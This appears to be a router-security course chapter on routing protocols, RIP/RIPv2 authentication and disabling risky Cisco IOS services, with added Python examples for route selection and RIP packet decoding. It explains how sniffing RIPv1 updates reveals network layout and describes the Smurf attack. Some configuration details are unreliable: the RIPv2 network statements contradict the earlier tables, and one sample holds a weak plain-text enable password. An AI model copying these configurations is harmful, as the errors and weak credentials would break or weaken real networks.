Distance Vector routing calculates the distance to a given network segment and the direction (or vector) required to reach the segment. The Distance Vector algorithm (Bellman-Ford) is designed to pass the routing table from neighbor to neighbor. The passing of the routing table is called the update between routers. In the event of a topology change, such as a router going offline, an update is sent immediately from one router to another.

Figure 5-10: Routers passing the routing table.

In Distance Vector routing, the routing table is passed between routers along the shared segments. In Figure 5-10, Router A and Router B share their routing tables over the segment between them, out Interface E2 of Router A and out of Interface E0 of Router B.

When the routers receive an update, they add any new information on how to reach new networks, or better paths (lower hop counts) to known networks. The algorithm adds one to the hop count for every router that must be crossed to reach the destination. Figure 5-11 shows a basic routing table with hop counts included.

Figure 5-11: A routing table with interfaces defined and hop counts.

In this example, the routing table has been created, and convergence has been achieved. Both routers have a consistent view of the network, and the routing tables define the path to the networks and the interface to forward packets out of to reach the required destinations.

topology: The map or plan of the network. The physical topology describes how the wires or cables are laid out, and the logical or electrical topology describes how the information flows.
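The update exchange and re-convergence described above, as an added Python simulation (this is not code from the course). The four-router topology mirrors Figure 5-9: a Marketing router reaches the Finance LAN through FinanceRouter1 in one hop, or through a transit router and FinanceRouter2 in two; all router and segment names are assumptions. It goes a little beyond the text by including split horizon with poison reverse, the distance-vector safeguard described in RFC 2453 that stops a withdrawn route from counting up to infinity.

```python
"""Distance-vector (Bellman-Ford) exchange with a hop-count metric.

Added example, not course code. The topology is constructed to mirror
Figure 5-9; router and segment names are assumptions.
"""
INFINITY = 16   # RIP's "unreachable" hop count


class DVRouter:
    def __init__(self, name, connected):
        self.name = name
        # network -> (hop count, next-hop router name); connected networks are 0 hops
        self.table = {net: (0, None) for net in connected}
        self.neighbors = []

    def advertise_to(self, neighbor):
        """The routing table as sent to one neighbour (the 'update' in the text).

        Poison reverse: routes learned *from* that neighbour go back as unreachable.
        """
        return {net: (INFINITY if via == neighbor else hops)
                for net, (hops, via) in self.table.items()}

    def receive(self, sender, update):
        """Merge a neighbour's update; return True if the table changed."""
        changed = False
        for net, hops in update.items():
            new = min(hops + 1, INFINITY)         # one more hop to get there via sender
            cur_hops, cur_via = self.table.get(net, (INFINITY, None))
            if new < cur_hops or (cur_via == sender and new != cur_hops):
                # better path, or the router we already use changed its mind (incl. withdrawals)
                self.table[net] = (new, sender)
                changed = True
        return changed

    def expire(self, dead_neighbor):
        """Neighbour stopped sending: everything learned from it becomes unreachable."""
        for net, (hops, via) in list(self.table.items()):
            if via == dead_neighbor:
                self.table[net] = (INFINITY, via)


def link(a, b):
    a.neighbors.append(b)
    b.neighbors.append(a)


def converge(routers, max_rounds=50):
    """Exchange updates until no table changes; return the number of rounds taken."""
    for rounds in range(1, max_rounds + 1):
        changed = False
        for r in routers:
            for n in r.neighbors:
                changed |= n.receive(r.name, r.advertise_to(n.name))
        if not changed:
            return rounds
    raise RuntimeError("no convergence (count to infinity?)")


def take_offline(routers, name):
    """Remove a router; its neighbours time out the routes they learned from it."""
    survivors = [r for r in routers if r.name != name]
    for r in survivors:
        r.neighbors = [n for n in r.neighbors if n.name != name]
        r.expire(name)
    return survivors


def build_topology():
    mr = DVRouter("Marketing", ["MarketingLAN", "Link1", "Link2"])
    fr1 = DVRouter("FinanceRouter1", ["Link1", "FinanceLAN"])
    transit = DVRouter("Transit", ["Link2", "Link3"])
    fr2 = DVRouter("FinanceRouter2", ["Link3", "FinanceLAN"])
    link(mr, fr1)
    link(mr, transit)
    link(transit, fr2)
    link(fr1, fr2)
    return [mr, fr1, transit, fr2]


def scenario():
    """Converge, take FinanceRouter1 offline, converge again; return both views."""
    routers = build_topology()
    rounds_before = converge(routers)
    before = dict(routers[0].table)
    survivors = take_offline(routers, "FinanceRouter1")
    rounds_after = converge(survivors)
    return {"rounds_before": rounds_before, "before": before,
            "rounds_after": rounds_after, "after": dict(routers[0].table),
            "finance2": dict(survivors[-1].table)}


if __name__ == "__main__":
    result = scenario()
    for when in ("before", "after"):
        print(f"Marketing table {when} FinanceRouter1 went offline:")
        for net, (hops, via) in sorted(result[when].items()):
            print(f"  {net:13s} hops={hops:2d} via={via}")
```

Before the failure, Marketing reaches FinanceLAN in one hop via FinanceRouter1; after FinanceRouter1 drops out, the route it learned from that neighbour is marked unreachable and the next round of updates replaces it with the two-hop path via Transit. Notice that `receive` accepts whatever a neighbour says on nothing more than the neighbour's name, which is exactly the situation with RIP version 1: any device that can put an update on the segment is a "neighbour".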


Link-State Routing

Where Distance Vector routing uses hop counts to make the path determination decisions in the routing table, Link-State routing uses a more complex metric system. In Link-State routing, all routers maintain a consistent view of the network, as they do in Distance Vector routing, but they are also all aware of the complete network topology.

Link-State routers know each network segment and the different options for reaching each segment. Convergence is just as critical in Link-State routing, and in order to have a converged network, there are steps that must be followed. Figure 5-12 shows a complex network, and after the diagram, the steps for convergence are outlined.

Figure 5-12: In this complex network, 7 routers and 14 network segments are defined.

The steps for network convergence are as follows:

1. The routers identify the routers that are their direct neighbors. For example, Router 3 will identify Router 6 and Router 4 as neighbors.

2. The routers send LSPs (Link State Packets) to the network. The LSPs contain data on which networks the router can reach. For example, Router 7 would send LSPs indicating that Router 7 is connected to segments 10.0.0.0, 11.0.0.0, 12.0.0.0, and 14.0.0.0.

3. The routers in the network accept all the LSPs and build a topology database of the network. The LSPs from all routers are used to build this consistent view.

4. The SPF (Shortest Path First) algorithm is used to determine the accessibility of each network and the shortest path between networks. The SPF algorithm is executed on all routers, so that they all end up with the same topology view of the network. Each router knows the best path to every segment.

5. The router uses the SPF calculations to determine the best (shortest) path for reaching each destination network on the internetwork.

Common Protocols

Here is a quick list of common routing protocols used on Cisco routers:

• RIP (Routing Information Protocol) is a Distance Vector protocol that uses hop count as its metric; 15 hops is the maximum, and 16 means unreachable.

• IGRP (Interior Gateway Routing Protocol) is a Cisco-proprietary Distance Vector protocol that uses a composite metric (bandwidth and delay, optionally load and reliability) for routing decisions.

• EIGRP (Enhanced Interior Gateway Routing Protocol) is an enhanced version of IGRP that combines properties of Link-State and Distance Vector protocols.

• OSPF (Open Shortest Path First) is a Link-State protocol that commonly replaces RIP in growing internetworks.

• BGP (Border Gateway Protocol) is the interdomain routing protocol used between autonomous systems, most visibly by Internet Service Providers.

• RTMP (Routing Table Maintenance Protocol) is Apple's routing protocol for AppleTalk. RTMP routers dynamically update topology changes in the network.

Administrative Distances

As the router has the ability to use static routes, dynamic routes, and multiple protocols, the ability to see the current routing table becomes even more critical as the network's complexity increases.

There is a function in the router called administrative distance. It has one obvious use: deciding what to do when two or more methods in the router are aware of a path to the same destination. For example, if you entered a static route to a location, and RIP then learned a route to that same location, which route should the router use?

This is where the administrative distance comes into play. The lower the value, the more the router trusts that source of routing information. Some default administrative distances are listed in the following table.

Route Type                     Distance
Directly connected interface   0
Static route                   1
IGRP route                     100
OSPF route                     110
RIP route                      120

Therefore, if you had a static route and a RIP route to the same network, the static route would be the one the router uses. When viewing the routing table, you are shown not only the current routes to destination networks but also the source of each route. The following fragments show a portion of the routing tables for three routers in a network:


LEFT#show ip route
R 192.168.10.0/24 [120/1] via 192.168.20.2, 00:00:13, Serial1
C 192.168.20.0/24 is directly connected, Serial1
C 172.16.0.0/16 is directly connected, Ethernet0
R 172.17.0.0/16 [120/1] via 192.168.20.2, 00:00:13, Serial1
R 172.18.0.0/16 [120/2] via 192.168.20.2, 00:00:13, Serial1

CENTER#show ip route
C 192.168.10.0/24 is directly connected, Serial1
C 192.168.20.0/24 is directly connected, Serial0
R 172.16.0.0/16 [120/1] via 192.168.20.1, 00:00:13, Serial0
C 172.17.0.0/16 is directly connected, Ethernet0
R 172.18.0.0/16 [120/1] via 192.168.10.1, 00:00:18, Serial1

RIGHT#show ip route
C 192.168.10.0/24 is directly connected, Serial0
R 192.168.20.0/24 [120/1] via 192.168.10.2, 00:00:20, Serial0
R 172.16.0.0/16 [120/2] via 192.168.10.2, 00:00:20, Serial0
R 172.17.0.0/16 [120/1] via 192.168.10.2, 00:00:20, Serial0
C 172.18.0.0/16 is directly connected, Ethernet0

In these fragments, you can identify the routes on each router, and you can tell the directly connected routes from the ones learned through RIP by the letter in front of each route: C marks a connected interface, and R marks a route learned through RIP. A route entered statically would be marked with an S.

For the RIP routes shown, note the bracketed pair after the prefix, for example [120/1]. The first number is the administrative distance of the route (120 for RIP); the number after the slash is the metric, which for RIP is the hop count. So LEFT reaches 172.17.0.0/16 in one hop via CENTER (192.168.20.2) and 172.18.0.0/16 in two hops along the same path.
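As an added example (not course code), the following Python parses the LEFT table above and applies the selection rules from this topic, then performs the one-hop rewriting described in the LAN-to-LAN and LAN-to-WAN sections: longest prefix match first, then administrative distance, then metric; IP addresses untouched, TTL decremented, link-layer addresses replaced. The extra static and more-specific routes used in the checks, the ARP cache contents, the interface link-layer addresses and the helper names are assumptions; the packet in the demo is modelled on Frame 12 of Task 5B-1, with the assumption that LEFT is the router whose MAC was recorded there.

```python
"""Route lookup on a parsed `show ip route` table, plus one hop of forwarding.

Added example, not course code. LEFT_OUTPUT is the table printed in the text;
the extra routes, ARP cache entries, interface link-layer addresses and helper
names are assumptions made for the demonstration.
"""
import re
from ipaddress import ip_address, ip_network

ADMIN_DISTANCE = {"C": 0, "S": 1, "I": 100, "O": 110, "R": 120}   # the text's table

LEFT_OUTPUT = """\
R 192.168.10.0/24 [120/1] via 192.168.20.2, 00:00:13, Serial1
C 192.168.20.0/24 is directly connected, Serial1
C 172.16.0.0/16 is directly connected, Ethernet0
R 172.17.0.0/16 [120/1] via 192.168.20.2, 00:00:13, Serial1
R 172.18.0.0/16 [120/2] via 192.168.20.2, 00:00:13, Serial1
"""

_ROUTE_RE = re.compile(
    r"^(?P<code>[A-Z])\s+(?P<prefix>[\d.]+/\d+)"
    r"(?:\s+\[(?P<ad>\d+)/(?P<metric>\d+)\]\s+via\s+(?P<via>[\d.]+)"
    r"(?:,\s+(?P<age>[\d:]+))?(?:,\s+(?P<iface>[A-Za-z]\S*))?"
    r"|\s+is directly connected,\s+(?P<ciface>\S+))"
)


def parse_routes(text):
    """Turn `show ip route` lines into dicts; non-route lines are skipped."""
    routes = []
    for line in text.splitlines():
        m = _ROUTE_RE.match(line.strip())
        if not m:
            continue
        g = m.groupdict()
        connected = g["ciface"] is not None
        routes.append({
            "code": g["code"],
            "prefix": ip_network(g["prefix"], strict=False),
            "ad": ADMIN_DISTANCE["C"] if connected else int(g["ad"]),
            "metric": 0 if connected else int(g["metric"]),
            "via": None if connected else g["via"],
            "iface": g["ciface"] if connected else g["iface"],
        })
    return routes


def select_route(routes, dst):
    """Longest prefix wins; for equal prefixes, lowest AD, then lowest metric.

    IOS installs only the lowest-AD route for a given prefix; ranking every
    candidate this way gives the same answer the installed table would.
    """
    dst = ip_address(dst)
    candidates = [r for r in routes if dst in r["prefix"]]
    if not candidates:
        return None
    return min(candidates, key=lambda r: (-r["prefix"].prefixlen, r["ad"], r["metric"]))


def forward(packet, routes, arp_cache, iface_addrs):
    """One router hop, as in the LAN-to-LAN and LAN-to-WAN walk-throughs.

    IP addresses are untouched, the TTL drops by one, and the link-layer
    addresses are rewritten for the outgoing interface. `packet` is a dict
    with src_ip, dst_ip, ttl, src_mac and dst_mac. On a serial link the
    "MAC" stands for whatever address the PPP or Frame Relay framing needs.
    """
    if packet["ttl"] <= 1:
        return None                    # would expire here: drop (ICMP time exceeded)
    route = select_route(routes, packet["dst_ip"])
    if route is None:
        return None                    # no route: drop (ICMP destination unreachable)
    next_hop = route["via"] or packet["dst_ip"]       # connected network: resolve the host itself
    if next_hop not in arp_cache:
        return None                    # a real router would ARP for it at this point
    return dict(packet, ttl=packet["ttl"] - 1, iface=route["iface"],
                src_mac=iface_addrs[route["iface"]], dst_mac=arp_cache[next_hop])


def demo():
    """Frame 12 of Task 5B-1 arriving at LEFT; cache and link addresses are constructed."""
    routes = parse_routes(LEFT_OUTPUT)
    packet = {"src_ip": "172.16.10.1", "dst_ip": "172.18.10.1", "ttl": 128,
              "src_mac": "00:d0:09:7f:0d:73", "dst_mac": "00:00:0c:8d:b8:54"}
    arp_cache = {"192.168.20.2": "aa:bb:cc:00:20:02"}
    iface_addrs = {"Ethernet0": "00:00:0c:8d:b8:54", "Serial1": "aa:bb:cc:00:20:01"}
    return select_route(routes, packet["dst_ip"]), forward(packet, routes, arp_cache, iface_addrs)


if __name__ == "__main__":
    route, out = demo()
    print(f"chosen: {route['code']} {route['prefix']} via {route['via']} metric {route['metric']}")
    print(f"forwarded: ttl={out['ttl']} dst_mac={out['dst_mac']} out {out['iface']}")
```

Two things worth trying with it: add a static route for 172.18.0.0/16 and watch it displace the RIP route purely on administrative distance, then add a RIP route for 172.18.5.0/24 with a worse metric and watch it win anyway for 172.18.5.1, because longest prefix match happens before anything else. Both behaviours are why a route that shows up with a lower distance, or a more specific prefix, than you expected deserves a second look.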

RIP

RIP, or the Routing Information Protocol, is one of the most straightforward routing protocols that can be implemented. RIP version 1 has no authentication at all, sends its full routing table as a broadcast every 30 seconds, and is therefore noisy; any host on the segment can read the updates, and nothing in the protocol stops one from sending them.

RIP functions by informing neighboring routers of the networks that the current router can reach. The initial routes are created during the simple configuration process of setting up RIP in the router.

The following configuration fragments show the configuration of RIP on the three routers LEFT, RIGHT, and CENTER. The network statements name the directly connected networks shown in the routing tables above: LEFT's serial link is 192.168.20.0/24 and RIGHT's is 192.168.10.0/24.

LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.20.0
LEFT(config-router)#^Z
LEFT#

RIGHT#configure terminal
RIGHT(config)#router rip
RIGHT(config-router)#network 172.18.0.0
RIGHT(config-router)#network 192.168.10.0
RIGHT(config-router)#^Z
RIGHT#

CENTER#configure terminal
CENTER(config)#router rip
CENTER(config-router)#network 172.17.0.0
CENTER(config-router)#network 192.168.10.0
CENTER(config-router)#network 192.168.20.0
CENTER(config-router)#^Z
CENTER#

In these fragments, RIP routing has been configured with the networks that each router can reach. For example, the LEFT router will announce that it can reach network 172.16.0.0, so if there is a packet destined for that network, the other routers should send it to the LEFT router.

Because RIP version 1 is broadcast-based, any host on a segment where the updates are sent receives them. Only the router has a legitimate routing function, but an attacker listening on the segment learns valuable information, such as the addressing and layout of the network.

TASK 5B-2 Viewing a RIP Capture

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Network Monitor is running.

1. Open rip update.cap, another capture file located on your course CD-ROM, in the \085545\Data\Captures folder.

2. Expand frame one, and observe the contents of the packet.

3. Look for the destination address of the packet. Find the IP and MAC destination addresses.

4. Observe the source address. You can conclude that this is likely the source address of a router in the network.

5. Expand the RIP portion of the frame capture.

6. Examine the network details sent in the packet. Even though you are an ordinary user on the network, you have captured the packet and are able to learn quite a few things about the network in a very short amount of time.

RIPv2

In order to address some of the issues associated with RIP, RIPv2 was introduced. Its security advantage is the ability to require authentication of RIP updates. It also carries the subnet mask with each route and sends its updates to the multicast address 224.0.0.9 rather than as a broadcast, so hosts that have not joined that group do not receive them (a sniffer in promiscuous mode still sees them, however). From a configuration perspective, RIPv2 is very similar to RIPv1, as shown previously. The following configuration fragments show the same three routers configured to use RIPv2 instead of RIPv1:


LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#version 2
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.10.0
LEFT(config-router)#^Z
LEFT#

RIGHT#configure terminal
RIGHT(config)#router rip
RIGHT(config-router)#version 2
RIGHT(config-router)#network 172.18.0.0
RIGHT(config-router)#network 192.168.20.0
RIGHT(config-router)#^Z
RIGHT#

CENTER#configure terminal
CENTER(config)#router rip
CENTER(config-router)#version 2
CENTER(config-router)#network 172.17.0.0
CENTER(config-router)#network 192.168.10.0
CENTER(config-router)#network 192.168.20.0
CENTER(config-router)#^Z
CENTER#

The authentication uses a shared key together with MD5 hashing of the updates. The following configuration fragment shows the setup of RIPv2 authentication. In this fragment, first each interface is told that RIP authentication is required and that MD5 mode is used, then the key chain and its key (the word “strongpassword”) are created.

Router#configure terminal
Router(config)#interface ethernet0
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#exit
Router(config)#interface serial0
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#exit
Router(config)#interface serial1
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#^Z
Router#configure terminal
Router(config)#key chain 3
Router(config-keychain)#key 1
Router(config-keychain-key)#key-string strongpassword
Router(config-keychain-key)#^Z
Router#

All routers that will exchange routing updates on the same network must use the same configuration, so the authentication will match. Once the router is configured, if you were to enter the show running-config command, you would get the following new pieces in the output:


enable secret 5 $1$v13S$Nk8zY5NcYor5VvAfcfZCn0
enable password 2501
!
!
key chain 3
 key 1
  key-string strongpassword

!
interface Ethernet0
 ip address 172.16.0.1 255.255.0.0
 ip rip authentication mode md5
 ip rip authentication key-chain 3
 no mop enabled
interface Serial0
 no ip address
 shutdown

TASK 5B-3
Viewing a RIPv2 Capture

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Network Monitor is running.

1. Open ripv2withAuthentication.cap, another capture file located on your course CD-ROM, in the \085545\Data\Captures folder.

2. Expand frame one, and observe the contents of the packet.

3. Look for the destination address of the packet. Find the IP and MAC destination addresses.

4. Observe the source address. You can conclude that this is likely the source address of a router in the network.

5. Expand the RIP portion of the frame capture.

6. Examine the network details sent in the packet.

7. Observe the addition of the Authentication portion of the capture and the additional fields not present in the RIPv1 packet.

8. Close Network Monitor.
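The two captures above show what a passive listener can read from a RIP update and how the authentication entry changes the RIPv2 packet. The following decoder is an added example, not part of the course material: it builds a RIPv1 response and an MD5-authenticated RIPv2 response from constructed data (the network addresses are those of the course's LEFT router) and parses both, so that you can see the route list any host on the segment receives, and the key ID, sequence number and digest trailer that RIPv2 authentication adds. The digest value is a placeholder; the real router computes it over the packet and the key.

```python
"""Decoder for RIPv1 and RIPv2 response packets (UDP port 520).

Added example; it is not part of the course material. Both packets are
constructed here; the network addresses come from the LEFT router's
configuration in this lesson.
"""
import struct
from ipaddress import IPv4Address

RIP_RESPONSE = 2
AFI_IP = 2
AFI_AUTH = 0xFFFF              # address family that marks an authentication entry
AUTH_SIMPLE, AUTH_MD5 = 2, 3   # RFC 2453 plain-text password, RFC 2082 keyed MD5
AUTH_TRAILER = 1               # last entry of an MD5 packet: carries the 16-byte digest


def parse_rip(data: bytes) -> dict:
    """Return command, version, routes and authentication details of one RIP packet."""
    if len(data) < 4 or (len(data) - 4) % 20:
        raise ValueError("RIP packet must be a 4-byte header plus 20-byte entries")
    out = {"command": data[0], "version": data[1], "routes": [], "auth": None}
    for off in range(4, len(data), 20):
        entry = data[off:off + 20]
        afi, tag = struct.unpack("!HH", entry[:4])
        if afi == AFI_AUTH and out["version"] == 2:
            if tag == AUTH_MD5:
                pkt_len, key_id, digest_len, seq = struct.unpack("!HBBI", entry[4:12])
                out["auth"] = {"type": "md5", "key_id": key_id, "seq": seq,
                               "packet_len": pkt_len, "digest_len": digest_len}
            elif tag == AUTH_SIMPLE:   # password travels in clear text: readable by any listener
                out["auth"] = {"type": "simple",
                               "password": entry[4:].rstrip(b"\0").decode("ascii", "replace")}
            elif tag == AUTH_TRAILER and out["auth"] is not None:
                out["auth"]["digest"] = entry[4:].hex()
            continue
        ip, mask, next_hop, metric = struct.unpack("!4s4s4sI", entry[4:])
        route = {"network": str(IPv4Address(ip)), "metric": metric}
        if out["version"] == 2:        # RIPv1 carries no mask or next hop in these fields
            route["mask"] = str(IPv4Address(mask))
            route["next_hop"] = str(IPv4Address(next_hop))
        out["routes"].append(route)
    return out


def build_rip_v1_response(routes) -> bytes:
    """routes: [(network, metric)] -> RIPv1 response as a router would broadcast it."""
    pkt = struct.pack("!BBH", RIP_RESPONSE, 1, 0)
    for net, metric in routes:
        pkt += struct.pack("!HH4s8xI", AFI_IP, 0, IPv4Address(net).packed, metric)
    return pkt


def build_rip_v2_md5_response(routes, key_id: int, seq: int,
                              digest: bytes = b"\0" * 16) -> bytes:
    """routes: [(network, mask, metric)] -> RIPv2 response with an RFC 2082 MD5
    authentication entry first and the digest trailer last. The digest is a
    placeholder; the router computes the real value over the packet and the key."""
    body_len = 4 + 20 * (len(routes) + 1)   # header + auth entry + routes, trailer excluded
    pkt = struct.pack("!BBH", RIP_RESPONSE, 2, 0)
    pkt += struct.pack("!HHHBBI8x", AFI_AUTH, AUTH_MD5, body_len, key_id, 16, seq)
    for net, mask, metric in routes:
        pkt += struct.pack("!HH4s4s4sI", AFI_IP, 0, IPv4Address(net).packed,
                           IPv4Address(mask).packed, b"\0" * 4, metric)
    pkt += struct.pack("!HH16s", AFI_AUTH, AUTH_TRAILER, digest)
    return pkt


if __name__ == "__main__":
    v1 = build_rip_v1_response([("172.16.0.0", 1), ("192.168.10.0", 1)])
    print(parse_rip(v1))
    v2 = build_rip_v2_md5_response([("172.16.0.0", "255.255.0.0", 1)], key_id=1, seq=7)
    print(parse_rip(v2))
```

Run it and compare the two dictionaries: the RIPv1 packet yields nothing but the route list, which is exactly what Task 5B-2 lets a random host learn, while the RIPv2 packet carries the key ID and a sequence number (which lets a receiver reject replayed updates) before the routes, and the digest after them. With simple-password authentication (type 2) the password itself is readable in the capture, which is why the course configures MD5 mode.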


Topic 5C
Removing Protocols and Services
The fundamental concept of hardening the router is no different than hardening Linux or Windows. You must remove all of the protocols and services that are unused. You must configure the required protocols and services so that they are secured for access. In this topic, you will look at removing many of the protocols and services that are often not used on a router and continue to harden the device.

CDP
The Cisco Discovery Protocol (CDP) is a protocol used by Cisco routers to exchange information, such as platform information and status, with each other. In general, CDP can be a useful thing to use when troubleshooting in a simple environment. Unfortunately, like most things that can make our lives as administrators a little easier, CDP can make an attacker’s job a little easier because it gives out important information such as the IOS version that the router is running. And, of course, knowing what IOS version is running makes an attacker’s job much easier since he or she will have a much better idea of what exploits will work against such a target.

In the following configuration fragment, you can see that turning off CDP for the entire router is not a complex set of commands—only two commands are required:

Router#config terminal
Router(config)#no cdp run
Router(config)#^Z
Router#

However, it may be desirable to stop CDP only on those interfaces that are not connected directly to another router. Perhaps there is only a direct link between two serial interfaces, and you want to allow CDP to run there, but not on the internal Ethernet network. In the following configuration fragment, CDP is disabled just for the Ethernet interface. Note that the only addition is the defining of the interface, and the command is no cdp enable, instead of no cdp run:

Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no cdp enable
Router(config-if)#^Z
Router#


TASK 5C-1
Turning Off CDP

1. Create the configuration fragment that you would use for turning off CDP on Ethernet 0, Ethernet 1, and Serial 1.

Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no cdp enable
Router(config-if)#interface Ethernet 1
Router(config-if)#no cdp enable
Router(config-if)#interface Serial 1
Router(config-if)#no cdp enable
Router(config-if)#^Z
Router#

ICMP
ICMP provides, among other functions, the ability to use the often-required ping and traceroute commands. However, ICMP has become one of the most misused of all protocols. DoS and DDoS attacks use ICMP, and more and more attacks take advantage of this function of the network. In this section, only a few examples of hardening ICMP are discussed.

ICMP Directed Broadcast
Smurf is an attack that takes advantage of ICMP. Specifically, what Smurf does is to get many machines to flood a single host with ICMP packets, effectively shutting down that host. The way this attack works is to ping the broadcast address of an entire network, using a spoofed source IP address. When every host of the network responds to that IP address, the machine that owns it has been attacked. This can easily lead to hundreds of machines responding to a host simultaneously.

The following configuration fragment shows the disabling of ICMP directed broadcasts on the Serial 1, Serial 0, and Ethernet 0 interfaces. To protect fully against this attack, you should turn off directed broadcasts like this on all interfaces.

Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#^Z
Router#

traceroute: An operation of sending trace packets for determining information; traces the route of UDP packets from the local host to a remote host. Normally traceroute displays the time and location of the route taken to reach its destination.

ICMP Unreachable
Another very common attack is for a potential intruder to scan your system(s) looking for services that are open and that can be exploited. It is common to use ICMP to perform these scans of systems. If you remove the ICMP Unreachable message, be aware that your system will not respond to desired unreachable messages either, for example when your internal users legitimately need them during timeouts. The following configuration fragment shows the disabling of ICMP Unreachable messages on the Serial 0 interface. To remove ICMP Unreachable messages on the entire router, this command needs to be entered for each interface.

Router#config terminal
Router(config)#interface Serial 0
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router#

TASK 5C-2
Hardening ICMP

1. Create the configuration fragment that you would use to disable ICMP Directed Broadcasts and ICMP Unreachable messages on the entire router, which has the Ethernet 0, Serial 0, and Serial 1 interfaces.

Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router#

Source Routing
A feature that was added to routers to increase the control administrators had over the network was source routing. This feature has become a vulnerability that attackers now use. Source routing allows a packet to dictate the path it should take through a routed network. Such a packet does not follow the routing tables as designated by the routing protocols. Doing so may allow an attacker to bypass critical systems, such as a firewall or an IDS. In most situations, there is no need for source routing to be allowed on any router. The configuration fragment that follows shows the disabling of the source routing service:

Router#config terminal
Router(config)#no ip source-route
Router(config)#^Z
Router#


Small Services
TCP and UDP small services are enabled on some routers by default (generally IOS 11.3 and previous versions). Small services are not often used anymore and include echo, discard, daytime, and chargen. On most routers, be sure to disable these services. The configuration fragment that follows shows the disabling of small services for both TCP and UDP:

Router#config terminal
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#^Z
Router#

Finger
Finger is another older service that is rarely used in modern networks. The Finger service is used to find information about users who are logged into a router. On older versions of the IOS (11.2 and older), Finger is disabled by using the no service finger command. On newer versions of the IOS (11.3 and newer), Finger is disabled by using the no ip finger command. In the following code, the first configuration fragment shows the removal of the Finger service from an older router, and the second fragment shows the removal of the Finger service from a newer router:

Router#config terminal
Router(config)#no service finger
Router(config)#^Z
Router#

Router#config terminal
Router(config)#no ip finger
Router(config)#^Z
Router#

Small services are also known as small servers.


Remaining Services
As a security professional, you know that hardening a piece of equipment means disabling or removing all of the services and protocols that you are not using. In this section, you will see several other services that you should consider disabling for your router. In consideration of space, every service and protocol cannot be listed in this section—only several of the significant services can be highlighted.

• The BootP service is used to remotely boot computers via the network. This service can be disabled by using the no ip bootp server command.

• The DNS function is enabled on Cisco routers, but there is no defined name server. The net result is broadcasting for all DNS requests. To disable this function, use the no ip name-server command.

• The Network Time Protocol (NTP) is used for time synchronization on the network. This service can be disabled by using the no ntp server command. If you want to disable this protocol for only a single interface, the command to use is ntp disable, when you are in the Interface Mode.

• The Simple Network Management Protocol (SNMP) is used to communicate between network devices. SNMP left as-is on routers can provide information about the router to attackers. Disable SNMP by using the no snmp-server command.

• HTTP is used on some versions of the routers to allow for remote access and management. Unless specifically required in your organization, this should be disabled. To disable HTTP, use the no ip http server command.

The configuration fragment that will disable all of the above services will look like this:

Router#config terminal
Router(config)#no ip bootp server
Router(config)#no ip name-server
Router(config)#no ntp server
Router(config)#no snmp-server
Router(config)#no ip http server
Router(config)#^Z
Router#

When NTP is used in conjunction with syslog services, thus keeping accurate timestamps on log entries, it can be useful for forensic purposes.


TASK 5C-3
Removing Unneeded Services

1. Create the configuration fragment that you would use to remove the following services from the whole IOS v12.x router: CDP, ICMP Directed Broadcasts, Small Servers, Source Routing, and Finger. For this exercise, you can assume that the interfaces are named E0, S0, and S1.

Router#config terminal
Router(config)#no cdp run
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#^Z
Router#
Router#config terminal
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#no ip source-route
Router(config)#no ip finger
Router(config)#^Z
Router#
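Entering these commands is one half of the job; verifying later that they are still in place is the other. The script below is an added example, not part of the course or of Cisco's own tooling: it reads a saved show running-config, splits it into global commands and per-interface blocks, and reports which of the Topic 5C hardening commands are absent. It looks for the explicit no ... lines, which is the right reading for the IOS 11.x-era defaults the course describes; on releases where a service is already off by default, IOS leaves the line out of the running-config, so treat a finding as something to verify on the device rather than as a confirmed exposure. The sample configuration is constructed, modelled on the running-config excerpt shown earlier in this lesson.

```python
"""Audit a Cisco IOS running-config for the hardening commands of Topic 5C.

Added example, not from the course. It reports the explicit 'no ...' lines
that are absent from a saved 'show running-config'. The sample config is
constructed for this example.
"""
import re
from typing import Dict, List, Tuple

GLOBAL_REQUIRED = [
    "no cdp run",                    # alternative: 'no cdp enable' on every interface
    "no service tcp-small-servers",
    "no service udp-small-servers",
    "no ip source-route",
    "no ip finger",                  # alternative on IOS 11.2 and older: 'no service finger'
    "no ip bootp server",
    "no ip http server",
]
INTERFACE_REQUIRED = ["no ip directed-broadcast", "no ip unreachables"]


def parse_config(text: str) -> Tuple[List[str], Dict[str, List[str]]]:
    """Return (global_lines, {interface_name: [indented sub-commands]}).
    Sub-commands of other modes (router, line) are kept with the global lines;
    that is enough for the checks below."""
    global_lines: List[str] = []
    interfaces: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.startswith("!"):
            continue
        if not line.startswith(" "):          # any top-level command ends an interface block
            current = None
        m = re.match(r"interface (\S+)$", line)
        if m:
            current = m.group(1)
            interfaces[current] = []
        elif current is not None:
            interfaces[current].append(line.strip())
        else:
            global_lines.append(line.strip())
    return global_lines, interfaces


def audit(text: str) -> Dict[str, object]:
    """Return {'global': [missing commands], 'interfaces': {name: [missing commands]}}."""
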